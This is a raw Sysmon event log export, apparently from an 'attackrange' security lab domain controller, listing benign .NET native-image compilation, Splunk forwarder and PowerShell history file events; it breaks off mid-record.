21:07:14.873{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C805-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C805-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C805-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-A282-60D3-C705-00000000CF01}5872NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4PML9HRIKA\System.Data.Services.Design.ni.dll.auxMD5=6BC14D38EB457C02B476ABA8DFA5EBB4,SHA256=26F51B7EC450E562691C88530211C10EA77FB703B78B52BE5548CCD55A2B9F3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-A282-60D3-C705-00000000CF01}5872NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4PML9HRIKA\System.Data.Services.Design.ni.dllMD5=02142202568474F8BC8237F7352E2B64,SHA256=5829CD5904E1032D2F1E951AECA74F630F06A63E11D6E15A5A84DCBC8DF3A43A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.826{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C705-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C705-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C705-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-A282-60D3-C605-00000000CF01}4100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7SPHU597M8\System.Data.Services.Client.ni.dll.auxMD5=39CEACC43388926F1107B7ABB511AC9D,SHA256=A36FB0EFF76405B902F734B86161680F2360B0994A94C3D5B56AA463AEFD650A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-A282-60D3-C605-00000000CF01}4100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7SPHU597M8\System.Data.Services.Client.ni.dllMD5=5DF1073391826E179073699E72362C35,SHA256=EDFB61F94E0D2EAF07492784F6819B4EE35514BF167175C88845E12C154D2934,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.717{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23922FE8BE6239C092B8D3185F2F49F5,SHA256=012DBC44DBA0D26D803856A4A18603FC8C573F7EFF5616AA16F36D08FCA76895,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.576{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt2021-06-23 21:07:14.576 10341000x800000000000000023532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C605-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.530{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C605-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.530{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C605-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.530{4DB9351A-A282-60D3-C505-00000000CF01}3928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1A2KLPYYTV\System.Data.Services.ni.dll.auxMD5=DD15555E62E4799C45C6B8DB498BBC0B,SHA256=8181C22CC38083A4944CF66B3A05EA7DAC5EC9D8F277AB1EEA56B54CD420B948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.530{4DB9351A-A282-60D3-C505-00000000CF01}3928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1A2KLPYYTV\System.Data.Services.ni.dllMD5=B68F7B89BE351EF3A8198D74FF5CCD86,SHA256=5C8B819FA6BE4E38F72C548D5A900A9BC1EF506927FB1CC0951EA06A57DBC284,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.373{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C505-00000000CF01}3928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.358{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C505-00000000CF01}3928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.358{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C505-00000000CF01}3928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.342{4DB9351A-A282-60D3-C405-00000000CF01}6428NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FMFB2Y8AI8\System.Data.OracleClient.ni.dll.auxMD5=331240F16F416FBE7D3FC54A6D916507,SHA256=BE6C9A08E21F43BF25C5B73826E098868B48C26BF351AAE27173BFF930B02B27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.342{4DB9351A-A282-60D3-C405-00000000CF01}6428NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FMFB2Y8AI8\System.Data.OracleClient.ni.dllMD5=726140BA4CB6DABD3F9A8D9E68F7545C,SHA256=550FC1FE51B420F3FFE0B87D3BB4EEA9F4AB16453EAB5BA702E6C524A0ACF674,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD0B038FBB56677A9ABBEC784EEF67E8,SHA256=E547BCA93FF901ECC428C863E79AAAA7DC88EF04557A4B40F9D171984F0491DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.248{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C405-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C405-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C405-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-A281-60D3-C305-00000000CF01}2196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G4KPA63ZUN\System.Data.ni.dll.auxMD5=67A266D123A5B25CE06C3B664F99A9F8,SHA256=2A1F8C79C854E56C222279D13ED888FA8F209B8D82B836563EDF690CA64D0770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-A281-60D3-C305-00000000CF01}2196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G4KPA63ZUN\System.Data.ni.dllMD5=B2FCE48D8D4D14020A1F2272EE23CE2D,SHA256=32C487ED7E407B3C5E9E3981C2498C07A2BB235CA30DE0CBAF1483AA87789905,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.748{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82B86C9F88162434113ACB8839D3434A,SHA256=4C8C912D0E03F3F864B03D98F24A67F2BBFB2AE71CCE866A18A82248168E2D83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A283-60D3-CB05-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.686{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A283-60D3-CB05-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 